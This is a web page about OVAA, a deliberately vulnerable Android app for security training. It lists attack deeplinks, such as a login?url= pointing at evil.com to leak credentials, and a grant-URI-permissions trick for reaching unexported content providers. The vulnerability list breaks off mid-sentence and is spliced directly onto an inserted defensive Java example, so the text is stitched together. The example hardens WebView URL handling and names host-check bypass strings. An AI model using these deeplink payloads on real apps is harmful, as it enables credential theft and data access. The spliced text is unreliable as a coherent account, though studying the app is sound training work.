OVAA (Oversecured Vulnerable Android App)

#Access Control #Specialized Security

OVAA (Oversecured Vulnerable Android App) - A Comprehensive Overview of Security Vulnerabilities

OVAA (Oversecured Vulnerable Android App) is an Android application that collects known and widespread security vulnerabilities of the platform in one place. The identified vulnerabilities are:

- Installation of an arbitrary login_url via the deeplink oversecured://ovaa/login?url=http://evil.com/, which leaks the user's username and password during the login process.
- Access to arbitrary content providers (ones that are not exported but carry the attribute android:grantUriPermissions="true") via the deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to handle the action ovaa.action.GRANT_PERMISSIONS and pass the intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION together with the URI of the content provider.
- Vulnerable host validation when processing the deeplink oversecured://ovaa/webview?url=....
- Opening of arbitrary URLs via the deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker may combine this with the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(
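The two WebView items above (weak host validation of the url parameter and a WebView that loads whatever URL the deeplink carries) and the login_url item share one root cause: a URL taken from an externally reachable deeplink is used without being parsed and checked. The following is an added defensive example written for this page; it is not code from the OVAA project. It uses the standard Android APIs (android.net.Uri, WebSettings) and assumes a hypothetical Activity name SafeWebViewActivity and a constructed allowlist host ovaa.example. The same validateUrl check applies to a login?url= parameter before it is ever stored as a login URL.

```java
// Added example, not OVAA's own code: hardened handling of a
// oversecured://ovaa/webview?url=... style deeplink.
// SafeWebViewActivity and the host "ovaa.example" are assumptions for illustration.
import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebSettings;
import android.webkit.WebView;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class SafeWebViewActivity extends Activity {
    // Hosts the app is willing to render; constructed placeholder values.
    private static final Set<String> ALLOWED_HOSTS =
            new HashSet<>(Arrays.asList("ovaa.example", "www.ovaa.example"));

    /**
     * Returns the URL if it uses https and its parsed host is on the allowlist,
     * otherwise null. Parsing first matters: a substring check such as
     * url.contains("ovaa.example") would accept http://evil.example/ovaa.example
     * or https://ovaa.example.evil.example, and a userinfo trick such as
     * https://ovaa.example@evil.example resolves to host evil.example.
     */
    static String validateUrl(String raw) {
        if (raw == null) {
            return null;
        }
        Uri uri = Uri.parse(raw);
        if (!"https".equalsIgnoreCase(uri.getScheme())) {
            return null; // also rejects javascript:, file:, content: and intent: schemes
        }
        String host = uri.getHost();
        if (host == null || !ALLOWED_HOSTS.contains(host.toLowerCase())) {
            return null;
        }
        return uri.toString();
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);

        WebSettings settings = webView.getSettings();
        // Deny file:// origins: no file system access and no cross-origin
        // access from file:// URLs, so a local page cannot read app files.
        settings.setAllowFileAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);

        Uri data = getIntent().getData();
        String target = (data == null) ? null : validateUrl(data.getQueryParameter("url"));
        if (target == null) {
            // Reject the deeplink instead of rendering an arbitrary page.
            finish();
            return;
        }
        webView.loadUrl(target);
    }
}
```

The scheme check and the exact host comparison are the parts that close the "vulnerable host validation" item; the three WebSettings calls are what prevents a page loaded through the deeplink from reaching local files even if the validation were bypassed. Keeping validateUrl a static method with no Android UI dependencies lets it be covered by plain JVM unit tests with crafted inputs such as the userinfo and subdomain cases noted in its comment.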